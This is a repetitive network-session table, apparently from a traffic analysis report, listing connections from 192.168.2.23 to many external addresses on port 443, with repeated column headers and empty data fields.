                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21720192.168.2.2338718179.158.11.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21721192.168.2.2339354158.218.138.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21722192.168.2.2358816221.210.33.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21723192.168.2.23358288.7.101.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21724192.168.2.2342724106.218.160.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21725192.168.2.2348248124.9.150.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21726192.168.2.2354730176.57.68.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21727192.168.2.2353044174.248.146.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21728192.168.2.234715495.113.172.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21729192.168.2.2338262147.227.213.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21730192.168.2.2333632165.185.149.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21731192.168.2.2341854197.75.218.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21732192.168.2.233441024.81.103.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21733192.168.2.23488669.45.249.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21734192.168.2.2360654121.248.69.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21735192.168.2.235313644.155.134.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21736192.168.2.235143041.138.228.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21737192.168.2.235216440.30.203.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21738192.168.2.2360170180.74.157.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21739192.168.2.234566676.17.204.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21740192.168.2.235603878.223.32.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21741192.168.2.2354258139.33.17.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21742192.168.2.2357348100.44.227.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21743192.168.2.2334788188.187.169.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21744192.168.2.2354560145.113.180.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21745192.168.2.23532909.199.219.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21746192.168.2.234959079.4.192.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21747192.168.2.234239869.48.92.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21748192.168.2.2334644158.118.22.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21749192.168.2.2349296178.218.179.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21750192.168.2.23586602.79.85.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21751192.168.2.2336422206.144.238.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21752192.168.2.234798289.121.128.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21753192.168.2.23426742.111.79.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21754192.168.2.2356738206.151.150.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21755192.168.2.2337614191.123.245.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21756192.168.2.2338006128.162.113.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21757192.168.2.235967837.138.231.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21758192.168.2.2354548187.127.222.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21759192.168.2.2360572132.10.113.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21760192.168.2.235229279.72.141.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21761192.168.2.234117495.91.99.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21762192.168.2.235642686.196.237.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21763192.168.2.2344264140.74.99.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21764192.168.2.234505012.26.173.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21765192.168.2.2345508181.62.185.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21766192.168.2.2343582122.207.186.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21767192.168.2.2338764193.208.251.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21768192.168.2.2343776116.178.42.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21769192.168.2.2349914182.116.209.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21770192.168.2.2340906217.59.157.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21771192.168.2.2336818182.177.148.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21772192.168.2.234289437.226.184.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21773192.168.2.2349140200.85.12.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21774192.168.2.2342878104.196.7.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21775192.168.2.234434231.103.231.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21776192.168.2.23529005.61.184.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21777192.168.2.235667641.223.215.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21778192.168.2.235472094.214.131.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21779192.168.2.233452497.47.178.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21780192.168.2.235877642.246.206.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21781192.168.2.2358022102.96.178.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21782192.168.2.2345838151.244.16.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21783192.168.2.2345700122.90.189.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21784192.168.2.2358012104.135.157.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21785192.168.2.23596864.20.21.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21786192.168.2.2334728219.165.143.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21787192.168.2.2341054220.210.70.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21788192.168.2.233515431.218.71.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21789192.168.2.233862866.146.202.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21790192.168.2.2346762219.231.192.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21791192.168.2.235415663.96.243.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21792192.168.2.234320648.25.27.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21793192.168.2.233526885.178.9.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21794192.168.2.2360152159.129.145.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21795192.168.2.2350586126.149.221.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21796192.168.2.2337846204.196.33.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21797192.168.2.235947899.74.209.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21798192.168.2.2343170165.43.166.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21799192.168.2.235374695.185.31.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21800192.168.2.2339190158.203.186.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21801192.168.2.233723676.18.18.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21802192.168.2.234616037.69.132.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21803192.168.2.2351040211.107.236.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21804192.168.2.235158682.174.33.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21805192.168.2.234769827.129.207.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21806192.168.2.235396418.3.103.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21807192.168.2.2352140192.109.50.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21808192.168.2.2349124117.207.173.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21809192.168.2.234426458.140.77.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21810192.168.2.234142087.80.22.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21811192.168.2.23395505.96.97.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21812192.168.2.234004659.170.63.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21813192.168.2.2359632190.32.99.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21814192.168.2.2335636140.124.159.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21815192.168.2.2356758145.85.203.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21816192.168.2.234890827.79.92.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21817192.168.2.2335476144.9.111.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21818192.168.2.234582027.180.208.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21819192.168.2.233310232.241.6.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21820192.168.2.235955261.15.232.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21821192.168.2.2354462196.23.26.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21822192.168.2.2346746172.99.183.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21823192.168.2.2339336113.207.80.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21824192.168.2.234233264.150.134.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21825192.168.2.234326076.201.250.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21826192.168.2.235370467.228.84.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21827192.168.2.2335806201.89.238.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21828192.168.2.235560680.103.122.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21829192.168.2.233460461.212.91.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21830192.168.2.234525614.137.130.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21831192.168.2.2355568204.38.80.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21832192.168.2.2345886222.59.77.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21833192.168.2.23571642.115.242.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21834192.168.2.235253292.97.100.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21835192.168.2.2357960201.232.106.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21836192.168.2.2350684125.158.214.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21837192.168.2.233716832.127.71.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21838192.168.2.2345328164.149.146.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21839192.168.2.2333006203.53.90.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21840192.168.2.2343476168.41.31.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21841192.168.2.2341992123.50.0.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21842192.168.2.2351686189.43.194.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21843192.168.2.2352442203.17.146.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21844192.168.2.23532805.24.226.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21845192.168.2.2345784108.38.79.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21846192.168.2.2353262169.80.227.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21847192.168.2.234046018.202.39.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21848192.168.2.2347552137.193.84.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21849192.168.2.234487681.193.192.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21850192.168.2.2351766153.196.153.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21851192.168.2.235300462.248.58.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21852192.168.2.2346530148.197.144.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21853192.168.2.2349704111.34.236.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21854192.168.2.234277258.119.153.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21855192.168.2.2357632142.183.179.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21856192.168.2.2343624130.187.217.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21857192.168.2.234155654.155.87.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21858192.168.2.235868253.181.241.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21859192.168.2.2349362188.3.215.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21860192.168.2.235054431.28.155.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21861192.168.2.23531504.181.153.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21862192.168.2.2354060208.118.46.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21863192.168.2.234349253.230.133.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21864192.168.2.2351382101.195.97.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21865192.168.2.234092832.109.83.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21866192.168.2.2339190102.89.133.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21867192.168.2.234001418.103.164.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21868192.168.2.234723053.251.100.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21869192.168.2.2334246124.93.97.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21870192.168.2.236091824.182.187.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21871192.168.2.2339456110.73.82.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21872192.168.2.2348258201.78.125.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21873192.168.2.2345376124.216.28.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21874192.168.2.235133490.197.72.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21875192.168.2.235365499.25.49.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21876192.168.2.2341390128.172.44.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21877192.168.2.235116869.155.62.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21878192.168.2.234012060.123.184.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21879192.168.2.2333326142.126.217.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21880192.168.2.233423690.44.63.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21881192.168.2.234899859.226.96.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21882192.168.2.234077289.52.87.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21883192.168.2.2338700146.97.67.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21884192.168.2.233970275.56.4.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21885192.168.2.235260281.0.3.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21886192.168.2.2352536112.25.51.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21887192.168.2.2337354219.180.121.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21888192.168.2.235461625.252.145.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21889192.168.2.235302839.39.27.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21890192.168.2.236028012.183.252.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21891192.168.2.234780246.238.104.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21892192.168.2.235565839.55.218.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21893192.168.2.2339988202.67.181.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21894192.168.2.2348636205.70.77.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21895192.168.2.2347796102.197.213.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21896192.168.2.2336798145.91.53.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21897192.168.2.233795491.53.247.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21898192.168.2.234469018.149.159.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21899192.168.2.2352910104.120.241.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21900192.168.2.2354638128.34.89.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21901192.168.2.2357124119.13.186.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21902192.168.2.2334160168.89.176.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21903192.168.2.234219432.89.101.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21904192.168.2.234789432.204.206.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21905192.168.2.234306654.101.33.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21906192.168.2.2356536221.161.164.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21907192.168.2.2356734156.121.57.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21908192.168.2.235768647.21.199.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21909192.168.2.2352734205.84.51.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21910192.168.2.2357698157.14.35.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21911192.168.2.2342594162.197.30.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21912192.168.2.2352986128.136.207.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21913192.168.2.2356702123.115.140.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21914192.168.2.2358842221.223.162.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21915192.168.2.235066696.97.208.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21916192.168.2.2344892169.244.117.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21917192.168.2.2334350143.243.141.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21918192.168.2.2339074187.105.73.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21919192.168.2.235746258.218.80.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21920192.168.2.2356866153.79.201.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21921192.168.2.2357882217.28.175.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21922192.168.2.2351502210.56.14.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21923192.168.2.2350584101.143.43.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21924192.168.2.235582267.189.177.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21925192.168.2.233807458.38.152.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21926192.168.2.2349152113.254.182.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21927192.168.2.2339022175.35.27.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21928192.168.2.2350256206.45.55.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21929192.168.2.2345358158.195.160.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21930192.168.2.233535895.222.165.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21931192.168.2.235852413.2.44.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21932192.168.2.235157249.142.134.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21933192.168.2.2333174134.93.196.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21934192.168.2.234836668.28.226.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21935192.168.2.2334938163.11.255.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21936192.168.2.233608659.130.157.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21937192.168.2.2342140207.211.10.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21938192.168.2.2356396145.65.150.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21939192.168.2.2350902187.134.96.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21940192.168.2.234690275.130.233.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21941192.168.2.2340002164.190.179.165443
